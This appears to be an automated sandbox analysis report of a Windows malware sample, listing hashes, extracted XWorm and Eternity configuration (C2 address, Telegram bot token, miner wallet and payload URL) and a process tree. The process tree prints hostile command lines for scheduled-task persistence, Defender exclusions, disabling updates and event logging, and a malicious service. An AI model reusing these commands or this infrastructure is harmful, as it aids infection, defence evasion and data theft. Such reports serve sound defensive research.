Analysis
-
max time kernel
60s -
max time network
82s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
-
submitted
28-03-2024 00:56
General
-
Target
x326.exe
-
Size
455KB
-
MD5
c8d9593196962fa5d706a207c16674cd
-
SHA1
686a8e674e6615d5cd91f7b2cba0c755054b3f69
-
SHA256
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
-
SHA512
5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
-
SSDEEP
12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
Malware Config
Extracted
xworm
5.1
104.194.9.116:7000
bUezpCDHVjUVS3W9
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845
Extracted
eternity
47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q
-
payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 53 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\x326.exe"C:\Users\Admin\AppData\Local\Temp\x326.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\shrosz.exe"C:\Users\Admin\AppData\Local\Temp\shrosz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "installutil" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\installutil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\installutil.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "installutil" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\installutil.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\ServiceHub\installutil.exe"C:\Users\Admin\AppData\Local\ServiceHub\installutil.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\xkdnqz.exe"C:\Users\Admin\AppData\Local\Temp\xkdnqz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AHIMMUFK"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "AHIMMUFK"5⤵
- Launches sc.exe
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ijtcvu.exe"C:\Users\Admin\AppData\Local\Temp\ijtcvu.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵
- Drops startup file
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵
-
-
-
-
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exeC:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
824KB
MD565a9eed4730752578861699bc945b3bf
SHA12cc7f50010d4ff1dc5006f2436c7ccbb6a0e01d8
SHA2564e37a9dd6e6ccd52a8fc94657298072359021fe529017e232f4487693ad4697c
SHA5122739f68e0b7424e84c1d849a19edb00295e3adea4b184df26e9c0c02628cebf077431b6129a1478c36d9267e37400bd82523a30c693fab2effa1a098f54c9ed8
-
Filesize
321B
MD5f67fe6df08d4663b0496e9a0cc94640a
SHA1d07396cfcf0c6ac3baef97ce55da213a87923095
SHA256f7ebc9ed3149ecb8a190fbcb1d4e5524e1bdd0e603ab695d8ebff41da59fa2d4
SHA5124f92d4a762675eee10856d08921c75cf3f9a6f92e94c21f0ef0aa5147f9a84e168e6cdb001e9a66986b0cff1c454d50a5b44715676875cf5343a3cbc5c0d5e31
-
Filesize
41KB
MD53c94b02364ba067e6c181191a5273824
SHA1a44d2d25e0c36bee0fd319f4b990a67d8c34e852
SHA25656763f94d6998304d137f5c202fb2147da5f14a39f318c68a810fc351701486f
SHA5124b8bbcd2c0105170142a2b1f74569fac542180953bde7bdc7625c4d17e860cbfcb818a6813aedff39fe6e13bd71cfd5e3b3187b984e81532a6ed5998bab89cb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
756KB
MD5d76027fe4cfd48c7f8999c796e50e731
SHA15026422e84bf445e2d141529e2b808187a30d9f6
SHA256148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799
SHA5122e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d
-
Filesize
393KB
MD53f3a51617811e9581aba50376599efa6
SHA19b26aa73f43a4db9b216b90d1aa3e2e4d602fde8
SHA2565f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37
SHA5129ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3
-
Filesize
3.1MB
MD586e00d529b3b454a84b942ac916211e3
SHA1021c733e5448436b384bf0d3a0ba81f4d0d93f9a
SHA25630e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53
SHA5129a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e
-
Filesize
172KB
-
Filesize
248KB
-
Filesize
248KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
624KB
-
Filesize
56KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
2.8MB
-
Filesize
264KB
-
Filesize
100KB
-
Filesize
1.6MB
-
Filesize
112KB
-
Filesize
132KB
-
Filesize
220KB
-
Filesize
1.2MB
-
Filesize
136KB
-
Filesize
272KB
-
Filesize
104KB
-
Filesize
2.3MB
-
Filesize
192KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
72KB
-
Filesize
128KB
-
Filesize
704KB
-
Filesize
1.5MB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
296KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
10.8MB
-
Filesize
216KB
-
Filesize
216KB
-
Filesize
80KB
-
Filesize
1.2MB
-
Filesize
220KB
-
Filesize
132KB
-
Filesize
112KB
-
Filesize
1.6MB
-
Filesize
100KB
-
Filesize
136KB
-
Filesize
264KB
-
Filesize
56KB
-
Filesize
272KB
-
Filesize
2.3MB
-
Filesize
32KB
-
Filesize
624KB
-
Filesize
496KB
-
Filesize
120KB
-
Filesize
3.8MB
-
Filesize
136KB
-
Filesize
384KB
-
Filesize
744KB
-
Filesize
56KB
-
Filesize
64KB
-
Filesize
272KB
-
Filesize
1.1MB
-
Filesize
104KB
-
Filesize
656KB
-
Filesize
1.4MB
-
Filesize
96KB
-
Filesize
64KB
-
Filesize
80KB
-
Filesize
64KB
-
Filesize
112KB
-
Filesize
40KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
756KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
40KB
-
Filesize
672KB
-
Filesize
88KB
-
Filesize
10.8MB
-
Filesize
400KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
64KB
-
Filesize
10.8MB